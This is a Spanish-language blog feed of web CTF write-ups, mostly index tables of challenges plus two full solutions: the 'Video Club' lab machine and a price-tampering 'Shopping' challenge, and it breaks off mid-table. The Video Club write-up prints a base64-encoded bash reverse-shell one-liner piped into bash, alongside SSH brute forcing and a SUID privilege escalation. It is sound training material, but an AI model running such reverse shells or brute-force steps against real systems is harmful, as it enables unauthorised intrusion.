<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://sw4pped.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://sw4pped.github.io/" rel="alternate" type="text/html" /><updated>2026-03-14T17:33:55+00:00</updated><id>https://sw4pped.github.io/feed.xml</id><title type="html">Writeups Web</title><subtitle>Una colección de mis writeups sobre CTFs, wargames o laboratorios de la categoría web.</subtitle><author><name>Lepra</name></author><entry><title type="html">Máquinas de la comunidad</title><link href="https://sw4pped.github.io/comunidad" rel="alternate" type="text/html" title="Máquinas de la comunidad" /><published>2023-02-21T00:00:00+00:00</published><updated>2023-02-21T00:00:00+00:00</updated><id>https://sw4pped.github.io/comunidad</id><content type="html" xml:base="https://sw4pped.github.io/comunidad"><![CDATA[<p>Esta máquinas son creadas por miembros de la comunidad y se comparten través de redes sociales.</p>

<h1 id="autor-shelldredd">Autor: ShellDredd</h1>
<p>Links: <a href="https://discord.gg/qUemGhF6hF">Discord</a> - <a href="https://www.twitch.tv/shelldredd">Twitch</a> - <a href="https://www.youtube.com/channel/UCV_nyB99w6s3tNTSK6aRI9Q">Youtube</a><br />
Página donde almacena las máquinas: <a href="https://shelldredd.github.io/labs/maquinas-ctf.html">Link</a></p>

<hr />

<table>
  <thead>
    <tr>
      <th>Nombre de la máquina</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Video Club</td>
      <td><a href="/videoclub">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Esta máquinas son creadas por miembros de la comunidad y se comparten través de redes sociales.]]></summary></entry><entry><title type="html">ShellDredd - Video Club</title><link href="https://sw4pped.github.io/videoclub" rel="alternate" type="text/html" title="ShellDredd - Video Club" /><published>2023-02-21T00:00:00+00:00</published><updated>2023-02-21T00:00:00+00:00</updated><id>https://sw4pped.github.io/videoclub</id><content type="html" xml:base="https://sw4pped.github.io/videoclub"><![CDATA[<h1 id="descripción">Descripción</h1>
<hr />

<p>Creando esta máquina CTF me he dado cuenta de que ya tengo 3 décadas encima, de las cuales he vivido experiencias y conocido lugares que quizás jamás regresen, como lo es/fueron los “Video Club” o “Blockbuster”, practicamente extintos en la actualidad. Esta máquina alberga diversos métodos de cierta dificultad en su enumeración e intrusión al sistema a través del servicio web. La parte de sistema está estrucuturada con un nivel más adecuado a conocimentos básicos, dado que el tiempo y técnicas de la intrusión web son el fuerte de la máquina. [Esta máquina contiene varios secretos o easter eggs, te animo a que investigues y descubras cada uno de ellos.]</p>

<h1 id="solución">Solución</h1>
<hr />

<p>La descripción del autor nos cuenta que está máquina tiene de temática los “Video Club”. Nos cuenta también que está enfocada en la enumeración, los ataques web y que la dificultad está en la intrución.</p>

<p>Con esta información lo primero que realizo es un curl a la ip.</p>

<p><img src="/images/images-shelldredd/videoclub1.png" alt="" /></p>

<p>Pero me dice que no existe respuesta, esto me hace pensar que quizás el servidor web está en otro puerto como el 8000, 8080 o 443. Como tengo la máquina en local enumero con nmap todos los puertos, ya que es más rápido.</p>

<p><img src="/images/images-shelldredd/videoclub2.png" alt="" /></p>

<p>Veo un puerto 22 SSH y un 3377 que debería ser el servidor web, realizo curl a este nuevo puerto y confirmo que es el servidor web.</p>

<p><img src="/images/images-shelldredd/videoclub3.png" alt="" /></p>

<p>Desde este punto esta máquina destaca de las que siempre veo, está muy trabajada y es muy atractiva a la vista, esto hace más entretenido el proceso de resolver la máquina.</p>

<p><img src="/images/images-shelldredd/videoclub4.png" alt="" /></p>

<p>Después de enumerar un rato sin encontrar nada útil empiezo con la enumeración automatizada con gobuster.</p>

<p><img src="/images/images-shelldredd/videoclub5.png" alt="" /></p>

<p>Me señala que el archivo <code class="language-plaintext highlighter-rouge">robots.txt</code> existe.</p>

<p><img src="/images/images-shelldredd/videoclub6.png" alt="" /></p>

<p>Veo una cadena que parece base64, intento descifrarla pero no obtengo nada. Me llevo esta cadena a <a href="https://gchq.github.io/CyberChef/">cyberchef</a> para seguir intentando.</p>

<p><img src="/images/images-shelldredd/videoclub7.png" alt="" /></p>

<p>Resulta que solo era un mensaje. Aunque utilizé la opción <code class="language-plaintext highlighter-rouge">magic</code> de cyberchef quería saber en qué formato exactamente está cifrado.</p>

<p><img src="/images/images-shelldredd/videoclub8.png" alt="" /></p>

<p>Es rot13 con base64.</p>

<p><img src="/images/images-shelldredd/videoclub9.png" alt="" /></p>

<p>Pero el archivo robots.txt no termina ahí. Al final del robots.txt podemos ver el nombre de otro archivo <code class="language-plaintext highlighter-rouge">list-defaulters.txt</code>.</p>

<p><img src="/images/images-shelldredd/videoclub10.png" alt="" /></p>

<p>Este archivo nos muestro un listado de nicknames de amigos de shelldredd, un mesaje a <strong>sml</strong> (el creador de <a href="https://hackmyvm.eu/">HackMyVM</a>) y una mensaje a HackMyVM por su aniversario.</p>

<p>En este punto probé varias cosas, metí el listado de nicknames a un diccionario y empezé a fuzzear directorios con este diccionario, probé realizando ataques de fuerza bruta por SSH utilizando este diccionario como user y password.</p>

<p><img src="/images/images-shelldredd/videoclub11.png" alt="" /></p>

<p>Pero no conseguí nada. Seguí enumerando pero con más calma y empecé a leer los nombres de usuario.</p>

<p><img src="/images/images-shelldredd/videoclub12.png" alt="" /></p>

<p>Hay un nombre de usuario llamado <code class="language-plaintext highlighter-rouge">steg</code> y otro llamado <code class="language-plaintext highlighter-rouge">hide</code>, no creo que existan dos personas con estos nombre así que me puse a enumerar todos los videos e imágenes de la página.</p>

<p><img src="/images/images-shelldredd/videoclub13.png" alt="" /></p>

<p>Me descargué todo el sitio web con <code class="language-plaintext highlighter-rouge">wget</code> (intenté varias veces porque a veces se descarga todo y a veces no), y me puse a probar steghide con cada imagen. Luego hice un for loop para realizar un ataque de fuerza bruta a cada imagen con <code class="language-plaintext highlighter-rouge">stegseek</code> y <code class="language-plaintext highlighter-rouge">rockyou.txt</code>.</p>

<p><img src="/images/images-shelldredd/videoclub14.png" alt="" /></p>

<p>Pude romper dos archivos.</p>

<p><img src="/images/images-shelldredd/videoclub15.png" alt="" /></p>

<p>Metí las dos contraseñas en el diccionario de nombres de usuarios.</p>

<p><img src="/images/images-shelldredd/videoclub16.png" alt="" /></p>

<p>Uno de los archivos contiene una cadena de texto y el otro tiene un cadena en hexadecimal.</p>

<p><img src="/images/images-shelldredd/videoclub17.png" alt="" /></p>

<p>La cadena en hexadecimal dice <code class="language-plaintext highlighter-rouge">tr0n</code>. Metí ambas cadenas de texto a mi diccionario.</p>

<p><img src="/images/images-shelldredd/videoclub18.png" alt="" /></p>

<p>Luego de probar con las imágenes probé con los videos. Primero descargué los videos con <code class="language-plaintext highlighter-rouge">wget</code>.</p>

<p><img src="/images/images-shelldredd/videoclub26.png" alt="" /></p>

<p>Probé con steghide pero no soporta videos, así que me puse a ver los metadatos.</p>

<p><img src="/images/images-shelldredd/videoclub19.png" alt="" /></p>

<p>Noté que el Copyrigth se veía un poco raro, así que los anoté en un archivo.</p>

<p><img src="/images/images-shelldredd/videoclub20.png" alt="" /></p>

<p><img src="/images/images-shelldredd/videoclub27.png" alt="" /></p>

<p>Los agregué todos al diccionario porque me podrían servir.</p>

<p><img src="/images/images-shelldredd/videoclub29.png" alt="" /></p>

<p>Pero hay una cadena de texto rara que parece braile.</p>

<p><img src="/images/images-shelldredd/videoclub30.png" alt="" /></p>

<p>Al parecer es braile pero no sé qué significa. De todas formas lo metí al diccionario.</p>

<p><img src="/images/images-shelldredd/videoclub31.png" alt="" /></p>

<p>Hice lo mismo con las imágenes.</p>

<p><img src="/images/images-shelldredd/videoclub23.png" alt="" /></p>

<p><img src="/images/images-shelldredd/videoclub32.png" alt="" /></p>

<p>En este punte intenté con fuerza bruta por SSH con este diccionarion utilizandolo de user y password con hydra</p>

<p><img src="/images/images-shelldredd/videoclub25.png" alt="" /></p>

<p>Seguí enumerando la página web, leyendo el código fuente, mirando las peticiones, las cookies fuzzeando directorios con varios diccionarios, enumerando UDP con nmap, etc. Pero al final me quedé sin ideas.</p>

<p>Leí un hint que señalaba utilizar el diccionario para fuzzear los directorios de la página.</p>

<p>Enumeré con gobuster los directorios utilizando el diccionario y agregando extensiones comúnes. Agregé la extensión php porque anteriormente descubrimos la ruta <code class="language-plaintext highlighter-rouge">/manual</code> que existe en aplicaciones Apache.</p>

<p>Encuentro el archivo <code class="language-plaintext highlighter-rouge">c0ntr0l.php</code>.</p>

<p><img src="/images/images-shelldredd/videoclub34.png" alt="" /></p>

<p>Al irme a la página me aparece en blanco, esto me hace pensar que debo enumerar un parámetro.</p>

<p>Ya parece bastante obvio que debo utilizar el diccionario para enumerar el parámetro, pero no sé si este parametro sirve para listar archivos o para ejecutar comandos.</p>

<p>Primero pruebo con el <code class="language-plaintext highlighter-rouge">/etc/passwd</code> pero no consigo resultados.</p>

<p><img src="/images/images-shelldredd/videoclub35.png" alt="" /></p>

<p>Pruebo con el comando <code class="language-plaintext highlighter-rouge">id</code> y consigo ejecución de comandos con el parámetro <code class="language-plaintext highlighter-rouge">f1ynn</code>.</p>

<p><img src="/images/images-shelldredd/videoclub36.png" alt="" /></p>

<p>Formo una reverse shell en base64.</p>

<p><img src="/images/images-shelldredd/videoclub37.png" alt="" /></p>

<p>Me pongo en escucha por el puerto 1337.</p>

<p><img src="/images/images-shelldredd/videoclub38.png" alt="" /></p>

<p>Y hago que el backdoor desencripte la cadena en base64 y la ejecute.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo YmFzaCAtYyAnYmFzaCAgLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjkxLzEzMzcgMD4mMScK | base64 -d | bash
</code></pre></div></div>

<p><img src="/images/images-shelldredd/videoclub39.png" alt="" /></p>

<p>El comando se queda esperando y recibo una reverse shell.</p>

<p><img src="/images/images-shelldredd/videoclub40.png" alt="" /></p>

<p>Después de realizar un tratamiento de la tty y enumerar un poco obtengo la flag de usuario.</p>

<p><img src="/images/images-shelldredd/videoclub41.png" alt="" /></p>

<p>Enumero los archivos con permisos SUID y me aparece el archivo ionice.</p>

<p><img src="/images/images-shelldredd/videoclub42.png" alt="" /></p>

<p>Lo busco en <a href="https://gtfobins.github.io/gtfobins/ionice/#suid">GTFOBins</a> y encuentro una forma de obtener root.</p>

<p><img src="/images/images-shelldredd/videoclub43.png" alt="" /></p>

<p>En la ruta <code class="language-plaintext highlighter-rouge">/root</code> debería estar la flag de root pero solo nos encontramos con una nota para el nuevo administrador.</p>

<p><img src="/images/images-shelldredd/videoclub44.png" alt="" /></p>

<p>Nos dice que la película root.txt se ha movido y debemos encontrarla.</p>

<p><img src="/images/images-shelldredd/videoclub45.png" alt="" /></p>

<p>La encontramos con el comando find y está ubicada en <code class="language-plaintext highlighter-rouge">/opt</code></p>

<p><img src="/images/images-shelldredd/videoclub46.png" alt="" /></p>

<p>Tenemos la flag y un “ASCII art” que no entiendo qué es xD?.</p>

<p><img src="/images/images-shelldredd/videoclub47.png" alt="" /></p>

<h1 id="usuario-librarian">Usuario librarian</h1>

<p>Después de rootear la máquina me quedó la duda sobre el usuario librarian.</p>

<p>Si enumeramos la ruta <code class="language-plaintext highlighter-rouge">/home</code> vemos un directorio con el nombre <code class="language-plaintext highlighter-rouge">secret_film</code> que contiene un archivo llamado <code class="language-plaintext highlighter-rouge">dark.mp4</code>.</p>

<p><img src="/images/images-shelldredd/videoclub48.png" alt="" /></p>

<p>Podemos descargar este archivo iniciando un servidor HTTP con python.</p>

<p>Ejecutamos <code class="language-plaintext highlighter-rouge">python3 -m http.server 8080</code> en la máquina víctima y <code class="language-plaintext highlighter-rouge">wget &lt;ip victima&gt;:8080/dark.mp4</code> en nuestra máquina.</p>

<p><img src="/images/images-shelldredd/videoclub49.png" alt="" /></p>

<p>Si leemos los metadatos del video obtendremos las credenciales del usuario <code class="language-plaintext highlighter-rouge">librarian</code>.</p>

<p><img src="/images/images-shelldredd/videoclub50.png" alt="" /></p>

<p>Ingresamos por SSH con el usuario librarian y la contraseña <code class="language-plaintext highlighter-rouge">h4ns0l0</code>.</p>

<p><img src="/images/images-shelldredd/videoclub52.png" alt="" /></p>

<p><img src="/images/images-shelldredd/videoclub51.png" alt="" /></p>]]></content><author><name>Lepra</name></author><category term="ctf" /><category term="post" /><category term="writeups" /><category term="shelldredd" /><summary type="html"><![CDATA[Descripción]]></summary></entry><entry><title type="html">CTFLearn</title><link href="https://sw4pped.github.io/ctflearn" rel="alternate" type="text/html" title="CTFLearn" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/ctflearn</id><content type="html" xml:base="https://sw4pped.github.io/ctflearn"><![CDATA[<p>Link de la página: <a href="https://ctflearn.com/">https://ctflearn.com/</a></p>

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Basic Injection</td>
      <td><a href="/basic-injection">Link</a></td>
    </tr>
    <tr>
      <td>POST Practice</td>
      <td><a href="/post-practice">Link</a></td>
    </tr>
    <tr>
      <td>Don’t Bump Your Head(er)</td>
      <td><a href="/don-t-bump-your-head-er">Link</a></td>
    </tr>
    <tr>
      <td>My Blog</td>
      <td><a href="/my-blog">Link</a></td>
    </tr>
    <tr>
      <td>Inj3ction Time</td>
      <td><a href="/inj3ction-time">Link</a></td>
    </tr>
    <tr>
      <td>Gobustme</td>
      <td><a href="/gobustme">Link</a></td>
    </tr>
    <tr>
      <td>Calculat3 M3</td>
      <td><a href="/calculat3-m3">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Link de la página: https://ctflearn.com/]]></summary></entry><entry><title type="html">Hack This Site</title><link href="https://sw4pped.github.io/hackthissite" rel="alternate" type="text/html" title="Hack This Site" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/hackthissite</id><content type="html" xml:base="https://sw4pped.github.io/hackthissite"><![CDATA[<p>Link de la página: <a href="https://www.hackthissite.org/">https://www.hackthissite.org/</a></p>

<h2 id="basic">Basic</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Level 1(the idiot test)</td>
      <td><a href="/level-1-the-idiot-test">Link</a></td>
    </tr>
    <tr>
      <td>Level 2</td>
      <td><a href="/level-2">Link</a></td>
    </tr>
    <tr>
      <td>Level 3</td>
      <td><a href="/level-3">Link</a></td>
    </tr>
    <tr>
      <td>Level 4</td>
      <td><a href="/level-4">Link</a></td>
    </tr>
    <tr>
      <td>Level 5</td>
      <td><a href="/level-5">Link</a></td>
    </tr>
    <tr>
      <td>Level 6</td>
      <td><a href="/level-6">Link</a></td>
    </tr>
    <tr>
      <td>Level 7</td>
      <td><a href="/level-7">Link</a></td>
    </tr>
    <tr>
      <td>Level 8</td>
      <td><a href="/level-8">Link</a></td>
    </tr>
    <tr>
      <td>Level 9</td>
      <td><a href="/level-9">Link</a></td>
    </tr>
    <tr>
      <td>Level 10</td>
      <td><a href="/level-10">Link</a></td>
    </tr>
    <tr>
      <td>Level 11</td>
      <td><a href="/level-11">Link</a></td>
    </tr>
  </tbody>
</table>

<p><br /></p>

<h2 id="realistic">Realistic</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Chicago American **** Party (Level2)</td>
      <td><a href="/chicago-american-nz-party">Link</a></td>
    </tr>
    <tr>
      <td>Uncle Arnold’s Local Band Review</td>
      <td><a href="/uncle-arnolds-localband-review">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Link de la página: https://www.hackthissite.org/]]></summary></entry><entry><title type="html">OverTheWire</title><link href="https://sw4pped.github.io/overthewire" rel="alternate" type="text/html" title="OverTheWire" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/overthewire</id><content type="html" xml:base="https://sw4pped.github.io/overthewire"><![CDATA[<p>Link de la página: <a href="https://overthewire.org/wargames/">https://overthewire.org/wargames/</a></p>

<h2 id="natas-sin-navegador">Natas (sin navegador)</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Natas0</td>
      <td><a href="/level0">Link</a></td>
    </tr>
    <tr>
      <td>Natas 0 -&gt; 1</td>
      <td><a href="/level-0-1">Link</a></td>
    </tr>
    <tr>
      <td>Natas 1 -&gt; 2</td>
      <td><a href="/level-1-2">Link</a></td>
    </tr>
    <tr>
      <td>Natas 2 -&gt; 3</td>
      <td><a href="/level-2-3">Link</a></td>
    </tr>
    <tr>
      <td>Natas 3 -&gt; 4</td>
      <td><a href="/level-3-4">Link</a></td>
    </tr>
    <tr>
      <td>Natas 4 -&gt; 5</td>
      <td><a href="/level-4-5">Link</a></td>
    </tr>
    <tr>
      <td>Natas 5 -&gt; 6</td>
      <td><a href="/level-5-6">Link</a></td>
    </tr>
    <tr>
      <td>Natas 6 -&gt; 7</td>
      <td><a href="/level-6-7">Link</a></td>
    </tr>
    <tr>
      <td>Natas 7 -&gt; 8</td>
      <td><a href="/level-7-8">Link</a></td>
    </tr>
    <tr>
      <td>Natas 8 -&gt; 9</td>
      <td><a href="/level-8-9">Link</a></td>
    </tr>
    <tr>
      <td>Natas 9 -&gt; 10</td>
      <td><a href="/level-9-10">Link</a></td>
    </tr>
    <tr>
      <td>Natas 10 -&gt; 11</td>
      <td><a href="/level-10-11">Link</a></td>
    </tr>
    <tr>
      <td>Natas 11 -&gt; 12</td>
      <td><a href="/level-11-12">Link</a></td>
    </tr>
    <tr>
      <td>Natas 12 -&gt; 13</td>
      <td><a href="/level-12-13">Link</a></td>
    </tr>
    <tr>
      <td>Natas 13 -&gt; 14</td>
      <td><a href="/level-13-14">Link</a></td>
    </tr>
    <tr>
      <td>Natas 14 -&gt; 15</td>
      <td><a href="/level-14-15">Link</a></td>
    </tr>
    <tr>
      <td>Natas 15 -&gt; 16</td>
      <td><a href="/level-15-16">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Link de la página: https://overthewire.org/wargames/]]></summary></entry><entry><title type="html">PortSwigger</title><link href="https://sw4pped.github.io/portswigger" rel="alternate" type="text/html" title="PortSwigger" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/portswigger</id><content type="html" xml:base="https://sw4pped.github.io/portswigger"><![CDATA[<p>Link de la página: <a href="https://portswigger.net/web-security">https://portswigger.net/web-security</a></p>

<h2 id="sql-injection">SQL injection</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>SQL injection vulnerability in WHERE clause allowing retrieval of hidden data</td>
      <td><a href="/sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection vulnerability allowing login bypass</td>
      <td><a href="/sql-injection-vulnerability-allowing-login-bypass">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection UNION attack, determining the number of columns returned by the query</td>
      <td><a href="/sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection UNION attack, finding a column containing text</td>
      <td><a href="/sql-injection-union-attack-finding-a-column-containing-text">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection UNION attack, retrieving data from other tables</td>
      <td><a href="/sql-injection-union-attack-retrieving-data-from-other-tables">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection UNION attack, retrieving multiple values in a single column</td>
      <td><a href="/sql-injection-union-attack-retrieving-multiple-values-in-a-single-column">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection attack, querying the database type and version on Oracle</td>
      <td><a href="/sql-injection-attack-querying-the-database-type-and-version-on-oracle">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection attack, querying the database type and version on MySQL and Microsoft</td>
      <td><a href="/sql-injection-attack-querying-the-database-type-and-version-on-mysql-and-microsoft">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection attack, listing the database contents on non-Oracle databases</td>
      <td><a href="/sql-injection-attack-listing-the-database-contents-on-non-oracle-databases">Link</a></td>
    </tr>
    <tr>
      <td>SQL injection attack, listing the database contents on Oracle</td>
      <td><a href="/sql-injection-attack-listing-the-database-contents-on-oracle">Link</a></td>
    </tr>
    <tr>
      <td>Blind SQL injection with conditional responses</td>
      <td><a href="/blind-sql-injection-with-conditional-responses">Link</a></td>
    </tr>
    <tr>
      <td>Blind SQL injection with time delays</td>
      <td><a href="/blind-sql-injection-with-time-delays">Link</a></td>
    </tr>
    <tr>
      <td>Blind SQL injection with out-of-band interaction</td>
      <td><a href="/blind-sql-injection-with-out-of-band-interaction">Link</a></td>
    </tr>
  </tbody>
</table>

<p><br /></p>

<h2 id="authentication-vulnerabilities">Authentication vulnerabilities</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Username enumeration via different responses</td>
      <td><a href="/username-enumeration-via-different-responses">Link</a></td>
    </tr>
  </tbody>
</table>

<p><br /></p>

<h2 id="directory-traversal">Directory traversal</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>File path traversal, simple case</td>
      <td><a href="/file-path-traversal-simple-case">Link</a></td>
    </tr>
    <tr>
      <td>File path traversal, traversal sequences blocked with absolute path bypass</td>
      <td><a href="/file-path-traversal-traversal-sequences-blocked-with-absolute-path-bypass">Link</a></td>
    </tr>
    <tr>
      <td>File path traversal, traversal sequences stripped non-recursively</td>
      <td><a href="/file-path-traversal-traversal-sequences-stripped-non-recursively">Link</a></td>
    </tr>
    <tr>
      <td>File path traversal, traversal sequences stripped with superfluous URL-decode</td>
      <td><a href="/file-path-traversal-traversal-sequences-stripped-with-superfluous-url-decode">Link</a></td>
    </tr>
    <tr>
      <td>File path traversal, validation of start of path</td>
      <td><a href="/file-path-traversal-validation-of-start-of-path">Link</a></td>
    </tr>
    <tr>
      <td>File path traversal, validation of file extension with null byte bypass</td>
      <td><a href="/file-path-traversal-validation-of-file-extension-with-null-byte-bypass">Link</a></td>
    </tr>
  </tbody>
</table>

<p><br /></p>

<h2 id="os-command-injection">OS command injection</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>OS command injection, simple case</td>
      <td><a href="/os-command-injection-simple-case">Link</a></td>
    </tr>
    <tr>
      <td>Blind OS command injection with time delays</td>
      <td><a href="/blind-os-command-injection-with-time-delays">Link</a></td>
    </tr>
    <tr>
      <td>Blind OS command injection with output redirection</td>
      <td><a href="/blind-os-command-injection-with-output-redirection">Link</a></td>
    </tr>
  </tbody>
</table>

<p><br /></p>

<h2 id="information-disclosure-sin-burpsuite">Information disclosure (Sin Burpsuite)</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Information disclosure in error messages</td>
      <td><a href="/information-disclosure-in-error-messages">Link</a></td>
    </tr>
    <tr>
      <td>Information disclosure on debug page</td>
      <td><a href="/information-disclosure-on-debug-page">Link</a></td>
    </tr>
    <tr>
      <td>Source code disclosure via backup files</td>
      <td><a href="/source-code-disclosure-via-backup-files">Link</a></td>
    </tr>
    <tr>
      <td>Authentication bypass via information disclosure</td>
      <td><a href="/authentication-bypass-via-information-disclosure">Link</a></td>
    </tr>
    <tr>
      <td>Information disclosure in version control history</td>
      <td><a href="/information-disclosure-in-version-control-history">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Link de la página: https://portswigger.net/web-security]]></summary></entry><entry><title type="html">Digital Overdose 2022</title><link href="https://sw4pped.github.io/digitaloverdose2022" rel="alternate" type="text/html" title="Digital Overdose 2022" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/digitaloverdose2022</id><content type="html" xml:base="https://sw4pped.github.io/digitaloverdose2022"><![CDATA[<p>Link: <a href="https://ctftime.org/event/1760">https://ctftime.org/event/1760</a></p>

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Shopping</td>
      <td><a href="/shopping">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Link: https://ctftime.org/event/1760]]></summary></entry><entry><title type="html">Digital Overdose 2022 - Shopping</title><link href="https://sw4pped.github.io/shopping" rel="alternate" type="text/html" title="Digital Overdose 2022 - Shopping" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/shopping</id><content type="html" xml:base="https://sw4pped.github.io/shopping"><![CDATA[<h1 id="descripción">Descripción</h1>
<hr />

<p>Michael loves the Web Application Hacker’s handbook.</p>

<p>So much so, that he wants to buy another copy!</p>

<h1 id="solución">Solución</h1>
<hr />

<p>El reto nos presenta con una página de simula una librería.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-1.png" alt="" /></p>

<p>La descripción del reto nos dice que a Michael le encante el libro <strong>Web Application Hacker’s handbook</strong>, así que escribiremos el nombre de este libre en el buscador.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-2.png" alt="" /></p>

<p>Hacemos click en el botón <strong>+Add</strong>.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-3.png" alt="" /></p>

<p>Notamos que en la pestaña <strong>Bookcase</strong> ha aumentado un número.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-4.png" alt="" /></p>

<p>Tenemos las opciones de hacer <strong>Checkout</strong> y eliminar el libro.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-5.png" alt="" /></p>

<p>Podemos probar interceptar la petición que se realiza al hacer click en el botón <strong>Checkout</strong> con <strong>Burpsuite</strong>.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-6.png" alt="" /></p>

<p>En <strong>Burpsuite</strong> podemos observar que se realiza una petición por el método POST con los datos del <strong>precio</strong> y el <strong>nombre</strong> del libro.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-7.png" alt="" /></p>

<p>Nuestar misión es comprarle un libro a Michael, pero como no tenemos dinero vamos a modificar el precio y reducirlo a 0.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-8.png" alt="" /></p>

<p>Si dejamos de interceptar la petición volvemos a la página web y obtenemos la flag.</p>

<p><img src="/images/images-digital-overdose-2022/shopping-9.png" alt="" /></p>

<h1 id="flag">Flag</h1>
<hr />

<p><code class="language-plaintext highlighter-rouge">DOCTF{B£ware-of-Trusting-User$}</code></p>]]></content><author><name>Lepra</name></author><category term="DigitalOverdose" /><category term="ctf" /><category term="post" /><category term="writeups" /><summary type="html"><![CDATA[Resolución del reto "Shopping" del CTF Digital Overdose 2022 Autumn]]></summary></entry><entry><title type="html">Hack The Boo 2022</title><link href="https://sw4pped.github.io/hacktheboo2022" rel="alternate" type="text/html" title="Hack The Boo 2022" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/hacktheboo2022</id><content type="html" xml:base="https://sw4pped.github.io/hacktheboo2022"><![CDATA[<p>Los retos se almacenan en la página oficial de HackTheBox: <a href="https://www.hackthebox.com/">https://www.hackthebox.com/</a></p>

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Evaluation Deck</td>
      <td><a href="/evaluation-deck">Link</a></td>
    </tr>
    <tr>
      <td>Spookifier</td>
      <td><a href="/spookifier">Link</a></td>
    </tr>
    <tr>
      <td>Horror Feeds</td>
      <td><a href="/horror-feeds">Link</a></td>
    </tr>
    <tr>
      <td>Juggling Facts</td>
      <td><a href="/juggling-facts">Link</a></td>
    </tr>
    <tr>
      <td>Cursed Secret Party</td>
      <td><a href="/cursed-secret-party">Link</a></td>
    </tr>
  </tbody>
</table>]]></content><author><name>Lepra</name></author><summary type="html"><![CDATA[Los retos se almacenan en la página oficial de HackTheBox: https://www.hackthebox.com/]]></summary></entry><entry><title type="html">PicoCTF</title><link href="https://sw4pped.github.io/picoctf" rel="alternate" type="text/html" title="PicoCTF" /><published>2022-11-20T00:00:00+00:00</published><updated>2022-11-20T00:00:00+00:00</updated><id>https://sw4pped.github.io/picoctf</id><content type="html" xml:base="https://sw4pped.github.io/picoctf"><![CDATA[<p>Link de la página: <a href="https://picoctf.org/">https://picoctf.org/</a></p>

<h2 id="picogym-exclusive">PicoGym Exclusive</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>JAuth</td>
      <td><a href="/jauth">Link</a></td>
    </tr>
  </tbody>
</table>

<h2 id="picoctf-2019">PicoCTF 2019</h2>
<hr />

<table>
  <thead>
    <tr>
      <th>Nombre del reto</th>
      <th>Link</th>
    </tr>
  </thead>
  <tbody>
    <tr>
